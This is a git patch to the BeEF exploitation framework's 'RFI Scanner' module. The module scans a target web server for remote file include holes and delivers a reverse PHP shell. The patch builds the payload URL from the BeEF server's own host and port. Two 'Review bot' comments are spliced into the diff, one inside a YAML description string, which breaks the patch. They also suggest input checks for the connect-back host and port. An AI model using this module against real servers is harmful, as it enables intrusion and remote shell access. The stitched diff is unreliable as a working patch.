From 1318ccf019d9228febdcae044269f5e1a8fd4fec Mon Sep 17 00:00:00 2001
From: Brendan Coles
Date: Tue, 20 Jan 2015 12:18:50 +0000
Subject: [PATCH] remove payload url
---
 .../media/javascript/ui/panel/tabs/ZombieTabNetwork.js | 3 +--
 modules/exploits/rfi_scanner/command.js | 2 +-
 modules/exploits/rfi_scanner/config.yaml | 2 +-
 modules/exploits/rfi_scanner/module.rb | 4 ----
 4 files changed, 3 insertions(+), 8 deletions(-)
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
index 49ad129c2..b2b8266c7 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
@@ -436,12 +436,11 @@ ZombieTab_Network = function(zombie) {
 var mod_id = get_module_id("rfi_scanner");
 var lhost = prompt("Enter local IP for connect back shell:", 'LHOST');
 var lport = prompt("Enter local port for connect back shell:", 'LPORT');
- var payload_url = prompt("Enter BeEF server URL:", 'http://beef_host:beef_port/');
 alert("Now start your reverse shell handler on " + lhost + ':' + lport);
 commands_statusbar.update_sending('Shellshock scanning ' + ip + '...');
 $jwterm.ajax({
 contentType: 'application/json',
- data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload_url":payload_url, "payload":"reverse_php"}),
+ data: JSON.stringify({"rproto":proto, "rhost":ip, "rport":port, "lhost":lhost, "lport":lport, "payload":"reverse_php"}),
 dataType: 'json',
 type: 'POST',
 url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
diff --git a/modules/exploits/rfi_scanner/command.js b/modules/exploits/rfi_scanner/command.js
index 9c2170421..05d6240b7 100644
--- a/modules/exploits/rfi_scanner/command.js
+++ b/modules/exploits/rfi_scanner/command.js
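Review bot: In ZombieTabNetwork.js the `lhost` and `lport` values returned by `prompt()` go straight into the `JSON.stringify` payload on the changed `data:` line with no check, so a cancelled dialog posts `null` and an untouched one posts the placeholder text `LHOST`/`LPORT`. An early exit before the `alert()` call, for example `if (!lhost || !/^\d+$/.test(lport)) { return; }`, would keep a malformed request from being queued. The status-bar text says 'Shellshock scanning' although the module looked up is `rfi_scanner`, which reads like a copy-paste leftover. The enclosing handler begins and ends outside the hunk.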
@@ -10,7 +10,7 @@ beef.execute(function() {
 var rhost = '<%= @rhost %>';
 var rport = '<%= @rport %>';
 var base_dir = '<%= @base_dir %>';
- var payload_url = '<%= @payload_url %>/rfi_php_<%= @command_id %>.txt?';
+ var payload_url = beef.net.httpproto + '://'+beef.net.host+ ':' + beef.net.port + '/rfi_php_<%= @command_id %>.txt?';
 var target = rproto + '://' + rhost + ':' + rport + base_dir;
 var wait = '<%= @wait %>';
diff --git a/modules/exploits/rfi_scanner/config.yaml b/modules/exploits/rfi_scanner/config.yaml
index c0e52770a..5252a4f2b 100644
--- a/modules/exploits/rfi_scanner/config.yaml
+++ b/modules/exploits/rfi_scanner/config.yaml
@@ -9,7 +9,7 @@ beef:
 enable: true
 category: "Exploits"
 name: "RFI Scanner"
- description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the fuzzdb RFI list. Many of these vulns require the target to have register_globals enabled in the PHP config.
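Review bot: The added `payload_url` line in command.js carries no comment saying where the address now comes from, and its operators are spaced unevenly (`'://'+beef.net.host+ ':'`). With the operator-supplied option gone the value is implicit, so a comment above it such as `// payload URL is built from the beef.net.* values of the hooked session` and uniform spacing, `beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port`, would make the line easier to audit. The neighbouring `<%= ... %>` values are placed inside single-quoted literals as they are; whether they are escaped before rendering is not visible here and is worth confirming. The `beef.execute` callback continues past the hunk.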

The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below.

This module mounts the payload on the BeEF server. Be sure to specify the BeEF server URL below for the target server to connect to."
+ description: "This module scans the specified web server for ~2,500 remote file include vulnerabilities using the fuzzdb RFI list. Many of these vulns require the target to have register_globals enabled in the PHP config.

The scan will take about 10 minutes with the default settings. Successful exploitation results in a reverse shell. Be sure to start your shell handler on the local port specified below."
 authors: ["bcoles"]
 target:
 working: ["ALL"]
diff --git a/modules/exploits/rfi_scanner/module.rb b/modules/exploits/rfi_scanner/module.rb
index 83d5ab4ad..70c22fa64 100644
--- a/modules/exploits/rfi_scanner/module.rb
+++ b/modules/exploits/rfi_scanner/module.rb
@@ -149,11 +149,8 @@ EOS
 def self.options
 configuration = BeEF::Core::Configuration.instance
- proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
- beef_port = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
 lhost = configuration.get("beef.http.public") || configuration.get("beef.http.host")
 lhost = "" if lhost == "0.0.0.0"
- url = "#{proto}://#{lhost}:#{beef_port}"
 return [
 { 'name' => 'rproto',
 'type' => 'combobox',
@@ -173,7 +170,6 @@ EOS
 { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1' },
 { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
 { 'name' => 'base_dir', 'ui_label' => 'Base Directory', 'value' => '/' },
- { 'name' => 'payload_url', 'ui_label' => 'BeEF server URL', 'value' => url },
 { 'name' => 'payload',
 'type' => 'combobox',
 'ui_label' => 'Payload',